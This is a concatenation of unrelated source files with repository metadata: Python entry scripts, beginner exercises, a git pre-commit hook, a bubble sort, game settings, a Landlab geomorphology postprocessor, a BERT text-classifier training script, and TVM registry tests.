e206135564137b588ccfb0b4552178b9fedd9288
|
f0c8692bb958b4f9d375e497f27e8b9f1f0a7f89
|
refs/heads/master
| 2022-11-05T08:29:22.749066
| 2020-06-21T05:20:37
| 2020-06-21T05:20:37
| 273,838,272
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 261
|
7
|
#!/Users/suryanuj/PycharmProjects/btctracker/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from numpy.f2py.f2py2e import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"suryanuj@udel.edu"
] |
suryanuj@udel.edu
|
a5ccc09d7d0c444b38aea3201e3f43bbd7d419df
|
b11e3ae9cb19091f9babd0addb38a9537fb79b21
|
/venv/Scripts/easy_install-3.7-script.py
|
fdd7d963c1265ceb076f2648798e521ff245db29
|
[] |
no_license
|
scorchgid/OWM-Application
|
2d47d5b9f3da570f5f4b8366d842431593087f8e
|
268b6c54dd5df417b2e302adcd33fc10c426ac84
|
refs/heads/master
| 2020-07-22T14:22:00.958513
| 2019-09-17T18:53:37
| 2019-09-17T18:53:37
| 207,231,499
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 467
|
py
|
#!C:\Users\Gideon\PycharmProjects\OWM-Application\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
|
[
"scorchgid@gmail.com"
] |
scorchgid@gmail.com
|
9750a57f98f60e192b3530c22876a6db24b56047
|
e67b0c01d7244f1c635d7c2e12157076bcd2efbc
|
/EX06/ex6.py
|
72ee32c78b12115672c3bead9de6607b7e6f755f
|
[] |
no_license
|
SonjaGrusche/LPTHW
|
0a7de74101db1b0ae62ffc35d4fac990c894ae14
|
12483e97373c9e0aa9e8785b20bb34e1e5b4b36a
|
refs/heads/master
| 2021-01-12T15:52:06.404665
| 2017-03-21T10:27:53
| 2017-03-21T10:27:53
| 71,830,953
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,301
|
py
|
# the variable x gets set; it consists of a string with a format character and its value at the end
x = "There are %d types of people." % 10
# the variable for binary is binary
binary = "binary"
# the variable for do_not is don't
do_not = "don't"
# the variable y is a string that includes two format characters and their values at the end
y = "Those who know %s and those who %s." % (binary, do_not) # two strings inside a string
# lines 11 and 12 print what's inside the variables x and y
print x
print y
# lines 15 and 16 print what's inside the quotes, using the variables at the end to fill in the format characters
print "I said %r." % x # string inside string
print "I also said: '%s'." % y # one string that already includes two strings is put inside string
# lines 19 and 20 define two more variables
hilarious = False
joke_evaluation = "Isn't that joke so funny?! %r"
# line 23 prints the variable for joke_evaluation and fills in the variable for hilarious for the format character
print joke_evaluation % hilarious
# line 26 and 27 define two variables
w = "This is the left side of..."
e = "a string with a right side."
# the variables from lines 26 and 27 get printed, concatenated
print w + e
# Study Drill
# 4. the + concatenates the two strings (it is not functioning as a math operator)
|
[
"sonja.grusche@stud.leuphana.de"
] |
sonja.grusche@stud.leuphana.de
|
67a00c31c0fab3d6c19689900052c3bc7f8309ee
|
ab81f9cfebe641b3400901e77a7fc6ee4cba3180
|
/src/pre-commit
|
aafdce2b8b01da9bfc1cd65013f17d0d5bf32d35
|
[] |
no_license
|
1garo/git_python_script
|
0ffbe272e8d3fb1056506e3f45e5d7ef271c4e2b
|
d68c05f3034c877530531ebe98503062e10278c0
|
refs/heads/master
| 2020-09-09T02:43:35.112667
| 2019-11-14T16:30:31
| 2019-11-14T16:30:31
| 221,321,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,031
|
#!/usr/bin/env python3
import script_2
import os
def create():
documents = os.popen(
"git diff --cached --name-status").read().splitlines() # Pega todos os documentos dentro da cache prestes a serem comitados
i = 0
alcance = len(documents)
while i < alcance:
full_line = documents[i].split()
if full_line[0] == "R100":
documents[i] = full_line[2]
i += 1
elif full_line[0] == "D":
documents.pop(i)
alcance -= 1
else:
documents[i] = full_line[1]
i += 1
block = 0
resp = "Testes OK. Commit Realizado"
i = 0
for i in range(len(documents)):
r = script_2.main(documents[i]) # Faz a verificacao definida em scriptPat.Compare
if r == 0:
print(documents[i] + " : Teste realizado com sucesso")
else:
resp = "Nao commitado"
block = 1
print(resp)
os._exit(block) # Bloqueia o commit
if __name__ == '__main__':
create()
|
[
"alevardai@hotmail.com"
] |
alevardai@hotmail.com
|
|
839af1b1bae6047079453f2f80a9265386152b24
|
24c84c5b93cd816976d370a99982f45e0d18a184
|
/SearchingSorting/BubbleSort.py
|
af60e6f3c4c2e2ff5a7dda335ee95c1b44f0a6c1
|
[] |
no_license
|
purushottamkaushik/DataStructuresUsingPython
|
4ef1cf33f1af3fd25105a45be4f179069e327628
|
e016fe052c5600dcfbfcede986d173b401ed23fc
|
refs/heads/master
| 2023-03-12T13:25:18.186446
| 2021-02-28T18:21:37
| 2021-02-28T18:21:37
| 343,180,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 235
|
py
|
def bubblesort(arr):
    # repeatedly swap adjacent out-of-order elements; after pass i the last i items are in place
    for i in range(len(arr)):
        for j in range(len(arr)-i-1):
            if arr[j] > arr[j+1]:
                arr[j], arr[j+1] = arr[j+1], arr[j]
arr = [1,10,2,12,5]
print(arr)
bubblesort(arr)
print(arr)
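# Complexity note (added): bubble sort does O(n^2) comparisons in the worst and
# average case with O(1) extra space. An early-exit flag (stop when a full pass
# makes no swaps) would give O(n) best-case behaviour on already-sorted input.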
|
[
"purushottamkaushik96@gmail.com"
] |
purushottamkaushik96@gmail.com
|
fc6477a6967e95f2b3e5884278adfc5093b566e6
|
ba4706218366e65b35dc5892a77c3394c374ea6f
|
/settings.py
|
afa28b8bb01fed93b4af4fb6cb5e298c5578575e
|
[] |
no_license
|
tngo0508/alien_invasion
|
e282f82a0658049d04313e4f283b57ddc296465c
|
5dbd4a113e136065a81eb5d906a0b6feb158b33b
|
refs/heads/master
| 2020-03-26T04:43:04.861008
| 2018-08-16T05:15:03
| 2018-08-16T05:15:03
| 144,518,830
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,708
|
py
|
class Settings():
"""A class to store all settings for Alien Invasion."""
def __init__(self):
"""Initialize the game's static setting."""
# Screen settings
self.screen_width = 1200
self.screen_height = 800
self.bg_color = (230, 230, 230)
# Ship settings
self.ship_speed_factor = 1.5
self.ship_limit = 3
# Bullet Settings
self.bullet_speed_factor = 3
self.bullet_width = 3
self.bullet_height = 15
self.bullet_color = 60, 60, 60
self.bullets_allowed = 3
# Alien settings
self.alien_speed_factor = 1
self.fleet_drop_speed = 10
# fleet_direction of 1 represents right; -1 represents left.
self.fleet_direction = 1
self.alien_points = 50
# How quickly the game speeds up
self.speedup_scale = 1.1
# How quickly the alien point values increase
self.score_scale = 1.5
self.initialize_dynamic_setting()
def initialize_dynamic_setting(self):
"""Initialize settings that change throughout the game."""
self.ship_speed_factor = 1.5
self.bullet_speed_factor = 3
self.alien_speed_factor = 1
# fleet_direction of 1 represents right; -1 represents left.
self.fleet_direction = 1
# Scoring
self.alien_points = 50
def increase_speed(self):
"""Increase speed settings and alien point values."""
self.ship_speed_factor *= self.speedup_scale
self.bullet_speed_factor *= self.speedup_scale
self.alien_speed_factor *= self.speedup_scale
self.alien_points = int(self.alien_points * self.score_scale)
|
[
"tngo0508@gmail.com"
] |
tngo0508@gmail.com
|
27513eaeeed5a4e2b0c720da1465aca4782fe138
|
5df88ea861b19a7ffdd318ab64c0ca23f1baa30b
|
/ModelInputsAndRunScripts/PostprocessingScripts/calc_elev_and_slope.py
|
fbac57ec943376677705e3789afa14e46f46608b
|
[
"MIT"
] |
permissive
|
gregtucker/tucker_mccoy_hobley_grain_hill_manuscript
|
2283c7aa33d57ba61404d319cfb41679549016ff
|
179c73dc4e2f8b971028f23619e12acaf6a0ea7f
|
refs/heads/master
| 2020-03-08T15:28:27.288806
| 2018-06-05T15:14:26
| 2018-06-05T15:14:26
| 128,212,892
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,226
|
py
|
#!/usr/env/python
"""
calc_elev_and_slope.py
Reads output from a series of GrainHill runs, and for each, calculates:
1 - the maximum elevation
2 - the mean elevation
3 - the mean slope.
4 - the mean soil thickness.
5 - the fractional soil cover.
These are written to a csv file.
"""
import os
import sys
from landlab.io.native_landlab import load_grid
import numpy as np
DEFAULT_OUTPUT_NAME = 'grain_hill_results.csv'
DEFAULT_INPUT_NAME = 'grain_hill_model0001.nc.grid'
DEFAULT_INPUT_PATH = os.getcwd()
def calc_fractional_soil_cover(grid, node_state):
"""Calculate and return fractional soil versus rock cover."""
num_soil_air_faces = 0.0
num_rock_air_faces = 0.0
for link in range(grid.number_of_links):
tail = grid.node_at_link_tail[link]
head = grid.node_at_link_head[link]
if node_state[tail] == 0: # if tail is air, see if head is rock/sed
if node_state[head] == 7:
num_soil_air_faces += 1
elif node_state[head] == 8:
num_rock_air_faces += 1
elif node_state[head] == 0: # if head is air, see if tail is rock/sed
if node_state[tail] == 7:
num_soil_air_faces += 1
elif node_state[tail] == 8:
num_rock_air_faces += 1
total_surf_faces = num_soil_air_faces + num_rock_air_faces
frac_rock = num_rock_air_faces / total_surf_faces
frac_soil = num_soil_air_faces / total_surf_faces
print('Total number of surface faces: ' + str(total_surf_faces))
print('Number of soil-air faces: ' + str(num_soil_air_faces))
print('Number of rock-air faces: ' + str(num_rock_air_faces))
print('Percent rock-air faces: ' + str(100.0 * frac_rock))
print('Percent soil-air faces: ' + str(100.0 * frac_soil))
return frac_soil, total_surf_faces, num_soil_air_faces, num_rock_air_faces
def get_profile_and_soil_thickness(grid, data):
"""Calculate and return profiles of elevation and soil thickness.
"""
nc = grid.number_of_node_columns
elev = np.zeros(nc)
soil = np.zeros(nc)
for col in range(nc):
states = data[grid.nodes[:, col]]
(rows_with_rock_or_sed, ) = np.where(states > 0)
if len(rows_with_rock_or_sed) == 0:
elev[col] = 0.0
else:
elev[col] = np.amax(rows_with_rock_or_sed) + 0.5 * (col % 2)
soil[col] = np.count_nonzero(np.logical_and(states > 0, states < 8))
return elev, soil
def get_input_and_output_names(argv):
"""Parses names for input path, input file name, and output file.
Assumes that within the input path folder location there is a series of
folders that start with 'G', each containing an output grid."""
if len(argv) < 4:
out_name = DEFAULT_OUTPUT_NAME
else:
out_name = argv[3]
if len(argv) < 3:
in_name = DEFAULT_INPUT_NAME
else:
in_name = argv[2]
if len(argv) < 2:
in_path = DEFAULT_INPUT_PATH
else:
in_path = argv[1]
return in_path, in_name, out_name
def two_node_diff(a):
"""Calculate and return diffs over two nodes instead of one."""
N = len(a)
return a[2:] - a[:(N-2)]
def calc_mean_gradient(elev_profile):
"""Given elevation profile, calculates and returns mean gradient."""
N = len(elev_profile)
mid = (N + 1) // 2  # integer midpoint (// keeps this valid under Python 3 too)
# 1.73205 ~ sqrt(3): the horizontal distance spanned by two node columns on the hex grid
mean_grad_left = np.mean(two_node_diff(elev_profile[:mid])/1.73205)
mean_grad_right = np.mean(-two_node_diff(elev_profile[mid:])/1.73205)
mean_grad = (mean_grad_left + mean_grad_right) / 2.0
return mean_grad
def process_model_output_data(in_path, in_name):
"""Iterate through output files and process, returning list of results."""
results_list = []
for item in os.listdir(in_path):
if item[0] == 'G':
# Read the Landlab grid and pull out the node_state field
g = load_grid(in_path + '/' + item + '/' + in_name)
ns = g.at_node['node_state']
# Get the elevation profile
(elev, soil) = get_profile_and_soil_thickness(g, ns)
# Calculate mean and max elevation
N = len(elev)
hmax = np.amax(elev[2:N-2])
hmean = np.average(elev[2:N-2])
# Get mean gradient
grad_mean = calc_mean_gradient(elev)
# Get the mean soil thickness and fractional soil cover
soil_mean = np.mean(soil)
(fs, nsurf, nsoil, nrock) = calc_fractional_soil_cover(g, ns)
run_number = item[17:]
run_number = run_number[:run_number.find('-')]
print(['run num ' + str(run_number) + ' ' + str(hmax)
+ ' ' + str(hmean) + ' ' + str(grad_mean) + ' '
+ str(soil_mean) + ' ' + str(fs) + ' ' + str(nsurf)
+ ' ' + str(nsoil) + ' ' + str(nrock)])
results_list.append((int(run_number), hmax, hmean, grad_mean,
soil_mean, fs, nsurf, nsoil, nrock))
results_list.sort()
return results_list
def write_output(results_list, out_name):
"""Write output to a file in csv format."""
outfile = open(out_name, 'w')
outfile.write('Run number,Max height,Mean height,Mean gradient,'
+ 'Mean soil thickness,Fractional soil cover,'
+ 'Total number of surface faces,'
+ 'Number of soil-air faces,'
+ 'Number of rock-air faces\n')
for item in results_list:
outstr = (str(item[0]) + ',' + str(item[1]) + ',' + str(item[2]) + ','
+ str(item[3]) + ',' + str(item[4]) + ',' + str(item[5])
+ ',' + str(item[6]) + ',' + str(item[7])
+ ',' + str(item[8]) + '\n')
outfile.write(outstr)
outfile.close()
def main():
"""Read, process, write, finish."""
(in_path, in_name, out_name) = get_input_and_output_names(sys.argv)
results_list = process_model_output_data(in_path, in_name)
write_output(results_list, out_name)
print('Processed ' + str(len(results_list)) + ' output files')
if __name__ == '__main__':
main()
|
[
"gtucker@colorado.edu"
] |
gtucker@colorado.edu
|
20a625ddaa72d4716cb4c286b72a4030d9773a0e
|
079731ed552f065c8f747ec068c2655d88ad3710
|
/run_classifier.py
|
d5ed740490f40eb60080e9e965c7ab004ee6c85a
|
[
"MIT"
] |
permissive
|
alyzleafbell/UER-py
|
5d402c023b92df5e3b6e379e8f2715f853e959e2
|
d33d9b2ee6f9324aacfbf06591bc63a11b1511b4
|
refs/heads/master
| 2023-01-20T04:16:48.010266
| 2020-12-02T09:41:01
| 2020-12-02T09:41:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,950
|
py
|
"""
This script provides an example to wrap UER-py for classification.
"""
import torch
import random
import argparse
import collections
import torch.nn as nn
from uer.utils.vocab import Vocab
from uer.utils.constants import *
from uer.utils.tokenizer import *
from uer.layers.embeddings import *
from uer.encoders.bert_encoder import *
from uer.encoders.rnn_encoder import *
from uer.encoders.birnn_encoder import *
from uer.encoders.cnn_encoder import *
from uer.encoders.attn_encoder import *
from uer.encoders.gpt_encoder import *
from uer.encoders.mixed_encoder import *
from uer.utils.optimizers import *
from uer.utils.config import load_hyperparam
from uer.utils.seed import set_seed
from uer.model_saver import save_model
class Classifier(nn.Module):
def __init__(self, args):
super(Classifier, self).__init__()
self.embedding = globals()[args.embedding.capitalize() + "Embedding"](args, len(args.tokenizer.vocab))
self.encoder = globals()[args.encoder.capitalize() + "Encoder"](args)
self.labels_num = args.labels_num
self.pooling = args.pooling
self.soft_targets = args.soft_targets
self.soft_alpha = args.soft_alpha
self.output_layer_1 = nn.Linear(args.hidden_size, args.hidden_size)
self.output_layer_2 = nn.Linear(args.hidden_size, self.labels_num)
def forward(self, src, tgt, seg, soft_tgt=None):
"""
Args:
src: [batch_size x seq_length]
tgt: [batch_size]
seg: [batch_size x seq_length]
"""
# Embedding.
emb = self.embedding(src, seg)
# Encoder.
output = self.encoder(emb, seg)
# Target.
if self.pooling == "mean":
output = torch.mean(output, dim=1)
elif self.pooling == "max":
output = torch.max(output, dim=1)[0]
elif self.pooling == "last":
output = output[:, -1, :]
else:
output = output[:, 0, :]
output = torch.tanh(self.output_layer_1(output))
logits = self.output_layer_2(output)
if tgt is not None:
if self.soft_targets and soft_tgt is not None:
loss = self.soft_alpha * nn.MSELoss()(logits, soft_tgt) + \
(1 - self.soft_alpha) * nn.NLLLoss()(nn.LogSoftmax(dim=-1)(logits), tgt.view(-1))
else:
loss = nn.NLLLoss()(nn.LogSoftmax(dim=-1)(logits), tgt.view(-1))
return loss, logits
else:
return None, logits
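# Note on the soft-target branch above: when soft_tgt (teacher logits) is
# provided, the loss is a knowledge-distillation mix of MSE against the
# teacher logits and NLL against the hard labels. A standalone sketch with
# hypothetical tensors (added for illustration only):
# logits = torch.randn(4, 3); soft = torch.randn(4, 3)
# tgt = torch.tensor([0, 2, 1, 0]); alpha = 0.5
# loss = alpha * nn.MSELoss()(logits, soft) + \
#        (1 - alpha) * nn.NLLLoss()(nn.LogSoftmax(dim=-1)(logits), tgt)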
def count_labels_num(path):
labels_set, columns = set(), {}
with open(path, mode="r", encoding="utf-8") as f:
for line_id, line in enumerate(f):
if line_id == 0:
for i, column_name in enumerate(line.strip().split("\t")):
columns[column_name] = i
continue
line = line.strip().split("\t")
label = int(line[columns["label"]])
labels_set.add(label)
return len(labels_set)
def load_or_initialize_parameters(args, model):
if args.pretrained_model_path is not None:
# Initialize with pretrained model.
model.load_state_dict(torch.load(args.pretrained_model_path), strict=False)
else:
# Initialize with normal distribution.
for n, p in list(model.named_parameters()):
if 'gamma' not in n and 'beta' not in n:
p.data.normal_(0, 0.02)
def build_optimizer(args, model):
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'gamma', 'beta']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay_rate': 0.01},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay_rate': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, correct_bias=False)
scheduler = WarmupLinearSchedule(optimizer, warmup_steps=args.train_steps*args.warmup, t_total=args.train_steps)
return optimizer, scheduler
def batch_loader(batch_size, src, tgt, seg, soft_tgt=None):
instances_num = src.size()[0]
for i in range(instances_num // batch_size):
src_batch = src[i*batch_size: (i+1)*batch_size, :]
tgt_batch = tgt[i*batch_size: (i+1)*batch_size]
seg_batch = seg[i*batch_size: (i+1)*batch_size, :]
if soft_tgt is not None:
soft_tgt_batch = soft_tgt[i*batch_size: (i+1)*batch_size, :]
yield src_batch, tgt_batch, seg_batch, soft_tgt_batch
else:
yield src_batch, tgt_batch, seg_batch, None
if instances_num > instances_num // batch_size * batch_size:
src_batch = src[instances_num//batch_size*batch_size:, :]
tgt_batch = tgt[instances_num//batch_size*batch_size:]
seg_batch = seg[instances_num//batch_size*batch_size:, :]
if soft_tgt is not None:
soft_tgt_batch = soft_tgt[instances_num//batch_size*batch_size:, :]
yield src_batch, tgt_batch, seg_batch, soft_tgt_batch
else:
yield src_batch, tgt_batch, seg_batch, None
def read_dataset(args, path):
dataset, columns = [], {}
with open(path, mode="r", encoding="utf-8") as f:
for line_id, line in enumerate(f):
if line_id == 0:
for i, column_name in enumerate(line.strip().split("\t")):
columns[column_name] = i
continue
line = line[:-1].split('\t')
tgt = int(line[columns["label"]])
if args.soft_targets and "logits" in columns.keys():
soft_tgt = [float(value) for value in line[columns["logits"]].split(" ")]
if "text_b" not in columns: # Sentence classification.
text_a = line[columns["text_a"]]
src = args.tokenizer.convert_tokens_to_ids([CLS_TOKEN] + args.tokenizer.tokenize(text_a))
seg = [1] * len(src)
else: # Sentence-pair classification.
text_a, text_b = line[columns["text_a"]], line[columns["text_b"]]
src_a = args.tokenizer.convert_tokens_to_ids([CLS_TOKEN] + args.tokenizer.tokenize(text_a) + [SEP_TOKEN])
src_b = args.tokenizer.convert_tokens_to_ids(args.tokenizer.tokenize(text_b) + [SEP_TOKEN])
src = src_a + src_b
seg = [1] * len(src_a) + [2] * len(src_b)
if len(src) > args.seq_length:
src = src[:args.seq_length]
seg = seg[:args.seq_length]
while len(src) < args.seq_length:
src.append(0)
seg.append(0)
if args.soft_targets and "logits" in columns.keys():
dataset.append((src, tgt, seg, soft_tgt))
else:
dataset.append((src, tgt, seg))
return dataset
def train_model(args, model, optimizer, scheduler, src_batch, tgt_batch, seg_batch, soft_tgt_batch=None):
model.zero_grad()
src_batch = src_batch.to(args.device)
tgt_batch = tgt_batch.to(args.device)
seg_batch = seg_batch.to(args.device)
if soft_tgt_batch is not None:
soft_tgt_batch = soft_tgt_batch.to(args.device)
loss, _ = model(src_batch, tgt_batch, seg_batch, soft_tgt_batch)
if torch.cuda.device_count() > 1:
loss = torch.mean(loss)
if args.fp16:
with args.amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
optimizer.step()
scheduler.step()
return loss
def evaluate(args, dataset, print_confusion_matrix=False):
src = torch.LongTensor([sample[0] for sample in dataset])
tgt = torch.LongTensor([sample[1] for sample in dataset])
seg = torch.LongTensor([sample[2] for sample in dataset])
batch_size = args.batch_size
instances_num = src.size()[0]
correct = 0
# Confusion matrix.
confusion = torch.zeros(args.labels_num, args.labels_num, dtype=torch.long)
args.model.eval()
for i, (src_batch, tgt_batch, seg_batch, _) in enumerate(batch_loader(batch_size, src, tgt, seg)):
src_batch = src_batch.to(args.device)
tgt_batch = tgt_batch.to(args.device)
seg_batch = seg_batch.to(args.device)
with torch.no_grad():
loss, logits = args.model(src_batch, tgt_batch, seg_batch)
pred = torch.argmax(nn.Softmax(dim=1)(logits), dim=1)
gold = tgt_batch
for j in range(pred.size()[0]):
confusion[pred[j], gold[j]] += 1
correct += torch.sum(pred == gold).item()
if print_confusion_matrix:
print("Confusion matrix:")
print(confusion)
print("Report precision, recall, and f1:")
for i in range(confusion.size()[0]):
p = confusion[i,i].item()/confusion[i,:].sum().item()
r = confusion[i,i].item()/confusion[:,i].sum().item()
f1 = 2*p*r / (p+r)
print("Label {}: {:.3f}, {:.3f}, {:.3f}".format(i,p,r,f1))
print("Acc. (Correct/Total): {:.4f} ({}/{}) ".format(correct/len(dataset), correct, len(dataset)))
return correct/len(dataset), confusion
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Path options.
parser.add_argument("--pretrained_model_path", default=None, type=str,
help="Path of the pretrained model.")
parser.add_argument("--output_model_path", default="./models/classifier_model.bin", type=str,
help="Path of the output model.")
parser.add_argument("--vocab_path", default=None, type=str,
help="Path of the vocabulary file.")
parser.add_argument("--spm_model_path", default=None, type=str,
help="Path of the sentence piece model.")
parser.add_argument("--train_path", type=str, required=True,
help="Path of the trainset.")
parser.add_argument("--dev_path", type=str, required=True,
help="Path of the devset.")
parser.add_argument("--test_path", type=str,
help="Path of the testset.")
parser.add_argument("--config_path", default="./models/bert_base_config.json", type=str,
help="Path of the config file.")
# Model options.
parser.add_argument("--batch_size", type=int, default=64,
help="Batch size.")
parser.add_argument("--seq_length", type=int, default=128,
help="Sequence length.")
parser.add_argument("--embedding", choices=["bert", "word"], default="bert",
help="Emebdding type.")
parser.add_argument("--encoder", choices=["bert", "lstm", "gru", \
"cnn", "gatedcnn", "attn", "synt", \
"rcnn", "crnn", "gpt", "bilstm"], \
default="bert", help="Encoder type.")
parser.add_argument("--bidirectional", action="store_true", help="Specific to recurrent model.")
parser.add_argument("--pooling", choices=["mean", "max", "first", "last"], default="first",
help="Pooling type.")
parser.add_argument("--factorized_embedding_parameterization", action="store_true", help="Factorized embedding parameterization.")
parser.add_argument("--parameter_sharing", action="store_true", help="Parameter sharing.")
# Tokenizer options.
parser.add_argument("--tokenizer", choices=["bert", "char", "space"], default="bert",
help="Specify the tokenizer."
"Original Google BERT uses bert tokenizer on Chinese corpus."
"Char tokenizer segments sentences into characters."
"Space tokenizer segments sentences into words according to space."
)
# Optimizer options.
parser.add_argument("--soft_targets", action='store_true',
help="Train model with logits.")
parser.add_argument("--soft_alpha", type=float, default=0.5,
help="Weight of the soft targets loss.")
parser.add_argument("--learning_rate", type=float, default=2e-5,
help="Learning rate.")
parser.add_argument("--warmup", type=float, default=0.1,
help="Warm up value.")
parser.add_argument("--fp16", action='store_true',
help="Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit.")
parser.add_argument("--fp16_opt_level", choices=["O0", "O1", "O2", "O3" ], default='O1',
help="For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3']."
"See details at https://nvidia.github.io/apex/amp.html")
# Training options.
parser.add_argument("--dropout", type=float, default=0.5,
help="Dropout.")
parser.add_argument("--epochs_num", type=int, default=3,
help="Number of epochs.")
parser.add_argument("--report_steps", type=int, default=100,
help="Specific steps to print prompt.")
parser.add_argument("--seed", type=int, default=7,
help="Random seed.")
args = parser.parse_args()
# Load the hyperparameters from the config file.
args = load_hyperparam(args)
set_seed(args.seed)
# Count the number of labels.
args.labels_num = count_labels_num(args.train_path)
# Build tokenizer.
args.tokenizer = globals()[args.tokenizer.capitalize() + "Tokenizer"](args)
# Build classification model.
model = Classifier(args)
# Load or initialize parameters.
load_or_initialize_parameters(args, model)
args.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = model.to(args.device)
# Training phase.
trainset = read_dataset(args, args.train_path)
random.shuffle(trainset)
instances_num = len(trainset)
batch_size = args.batch_size
src = torch.LongTensor([example[0] for example in trainset])
tgt = torch.LongTensor([example[1] for example in trainset])
seg = torch.LongTensor([example[2] for example in trainset])
if args.soft_targets:
soft_tgt = torch.FloatTensor([example[3] for example in trainset])
else:
soft_tgt = None
args.train_steps = int(instances_num * args.epochs_num / batch_size) + 1
print("Batch size: ", batch_size)
print("The number of training instances:", instances_num)
optimizer, scheduler = build_optimizer(args, model)
if args.fp16:
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
model, optimizer = amp.initialize(model, optimizer, opt_level = args.fp16_opt_level)
args.amp = amp
if torch.cuda.device_count() > 1:
print("{} GPUs are available. Let's use them.".format(torch.cuda.device_count()))
model = torch.nn.DataParallel(model)
args.model = model
total_loss, result, best_result = 0., 0., 0.
print("Start training.")
for epoch in range(1, args.epochs_num+1):
model.train()
for i, (src_batch, tgt_batch, seg_batch, soft_tgt_batch) in enumerate(batch_loader(batch_size, src, tgt, seg, soft_tgt)):
loss = train_model(args, model, optimizer, scheduler, src_batch, tgt_batch, seg_batch, soft_tgt_batch)
total_loss += loss.item()
if (i + 1) % args.report_steps == 0:
print("Epoch id: {}, Training steps: {}, Avg loss: {:.3f}".format(epoch, i+1, total_loss / args.report_steps))
total_loss = 0.
result = evaluate(args, read_dataset(args, args.dev_path))
if result[0] > best_result:
best_result = result[0]
save_model(model, args.output_model_path)
# Evaluation phase.
if args.test_path is not None:
print("Test set evaluation.")
if torch.cuda.device_count() > 1:
model.module.load_state_dict(torch.load(args.output_model_path))
else:
model.load_state_dict(torch.load(args.output_model_path))
evaluate(args, read_dataset(args, args.test_path), True)
if __name__ == "__main__":
main()
|
[
"1152543959@qq.com"
] |
1152543959@qq.com
|
e318067d8d92753c1ff55de7175dfdf9541e70e6
|
a1a518ba04855820f531c705c36028e4d7435a86
|
/tests/python/driver/tvmc/test_registry_options.py
|
458d0a88d1f727c407015444d34fe709309c781b
|
[
"Apache-2.0",
"BSD-3-Clause",
"Zlib",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"BSD-2-Clause"
] |
permissive
|
ZQPei/tvm
|
b47f7a3f16400774eefb5ca882a0053e46176a52
|
6c32f976522aa1d923fcfe364f05a7860cb346b4
|
refs/heads/main
| 2021-12-10T22:33:44.248391
| 2021-11-30T23:58:05
| 2021-11-30T23:58:05
| 203,511,290
| 0
| 1
|
Apache-2.0
| 2021-11-25T09:28:32
| 2019-08-21T05:17:34
|
Python
|
UTF-8
|
Python
| false
| false
| 2,911
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import pytest
from tvm.driver.tvmc.common import TVMCException
from tvm.driver.tvmc.registry import generate_registry_args, reconstruct_registry_entity
from tvm.relay.backend import Executor
def test_registry_to_argparse():
parser = argparse.ArgumentParser()
generate_registry_args(parser, Executor)
parsed, _ = parser.parse_known_args(["--executor=aot", "--executor-aot-interface-api=c"])
assert parsed.executor == "aot"
assert parsed.executor_aot_interface_api == "c"
def test_registry_to_argparse_default():
parser = argparse.ArgumentParser()
generate_registry_args(parser, Executor, "aot")
parsed, _ = parser.parse_known_args([])
assert parsed.executor == "aot"
def test_mapping_registered_args():
parser = argparse.ArgumentParser()
generate_registry_args(parser, Executor)
parsed, _ = parser.parse_known_args(["--executor=aot", "--executor-aot-interface-api=c"])
entity = reconstruct_registry_entity(parsed, Executor)
assert isinstance(entity, Executor)
assert "interface-api" in entity
assert entity["interface-api"] == "c"
def test_mapping_registered_args_no_match_for_name():
parser = argparse.ArgumentParser()
generate_registry_args(parser, Executor)
parsed, _ = parser.parse_known_args(["--executor=woof"])
with pytest.raises(TVMCException, match='Executor "woof" is not defined'):
reconstruct_registry_entity(parsed, Executor)
def test_mapping_registered_args_no_arg():
parser = argparse.ArgumentParser()
generate_registry_args(parser, Executor)
parsed, _ = parser.parse_known_args([])
    assert reconstruct_registry_entity(parsed, Executor) is None
def test_mapping_registered_args_mismatch_for_arg():
parser = argparse.ArgumentParser()
generate_registry_args(parser, Executor)
parsed, _ = parser.parse_known_args(["--executor=aot", "--executor-graph-link-params=1"])
with pytest.raises(
TVMCException,
match="Passed --executor-graph-link-params but did not specify graph executor",
):
reconstruct_registry_entity(parsed, Executor)
|
[
"noreply@github.com"
] |
ZQPei.noreply@github.com
|
